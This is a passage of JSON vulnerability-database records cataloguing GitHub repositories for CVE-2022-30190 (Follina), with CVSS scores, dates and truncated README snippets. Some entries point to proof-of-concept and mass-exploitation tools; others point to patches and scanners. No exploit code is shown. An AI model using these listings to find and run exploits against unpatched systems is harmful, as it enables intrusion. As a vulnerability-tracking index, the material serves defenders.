"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-15T16:12:57", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-29T16:29:42", "id": "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:47:58", "description": "# Five Nights at Follina's\nA Fullstack Academy Cybersecurity pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-01T16:47:50", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T16:10:38", "id": "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:21:17", "description": "[...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-19T18:09:47", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:57:47", "id": "DD36D028-7FB1-5824-9756-09BA3927DCEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:27", "description": "# CVE-2022-30190-mass-rce\nCVE-2022-30190 Zero click rce Mass Exp...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T17:28:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T17:31:11", "id": "75389328-1B05-5056-B8C0-C624BF0343AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:07:37", "description": "# Follina - CVE-2022-30190\n\nFollina is a zero day allowing code ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T15:39:20", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-02T00:23:18", "id": "8516D742-8A1C-521C-8372-26BA9FBA2200", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:09:22", "description": "# MSDT Patcher, a.k.a. CVE-2022-30190-NSIS\nThis is an NSIS scrip...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T18:58:07", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T08:02:05", "id": "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:07:48", "description": "# CVE-2022-30190-Follina-Patch\nThis is a simple program allows y...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T13:43:20", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-01T22:07:49", "id": "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:02:01", "description": "# CVE-2022-30190-follina\nJust another PoC for the new MSDT-Explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T11:37:08", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:02", "id": "B2474BAA-4133-5059-8F0B-5BAAE9664466", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:58:08", "description": "# follina-CVE-2022-30190\nfollina zer...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T22:49:21", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-16T00:04:19", "id": "6AF23F99-AE40-5899-AD81-AE3F71760F38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:40:48", "description": "# CVE-2022-30190 - Microsoft Support Diagnostic Tool\n\n## About\n\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T10:07:52", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:12", "id": "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:07:59", "description": "# go_follina\n\nFollina ([CVE-2022-30190](ht...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-27T16:14:34", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:32", "id": "45B4D881-57D9-51C8-B5B9-9A6DA7413A36", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-01T20:48:17", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-02T12:17:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-29T08:17:18", "id": "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:09:05", "description": "# CVE-2022-30190\n\n## Usag...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:13:16", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-06T16:59:02", "id": "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:08:49", "description": "# Follina-Remediation\nRemoves the ability for MSDT t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:26:56", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T20:26:21", "id": "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:26:07", "description": "Microsoft explains that \u201ca remote code execution vulnerability e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T15:24:54", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-18T20:13:19", "id": "81008F39-5622-5A06-95F5-737A63D240D0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:42:47", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHost exploit.html ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T06:45:25", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:00", "id": "1840A140-1CD9-55F2-A8BD-9B7B27779956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:58:42", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79_**\nThese are two Python scri...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T11:16:56", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:21:00", "id": "39D1AD81-7117-5EA3-8421-A33979B77F49", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-21T10:07:21", "description": "# 'Follina' MS-MSDT n-day Microsoft Office RCE\u2014\u4fee\u6539\u7248\n\n\u6839\u636e https://g...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T12:33:18", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-21T09:59:57", "id": "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:10:20", "description": "**NOTE**: This tool is now **obsolete**! [The Follina exploit is...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T02:47:34", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T23:35:56", "id": "30F42F9A-5E27-592E-BE65-B85DC7E22075", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:08:37", "description": "# FollinaScanner\nA tool written in Go that scans files & directo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T06:45:19", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 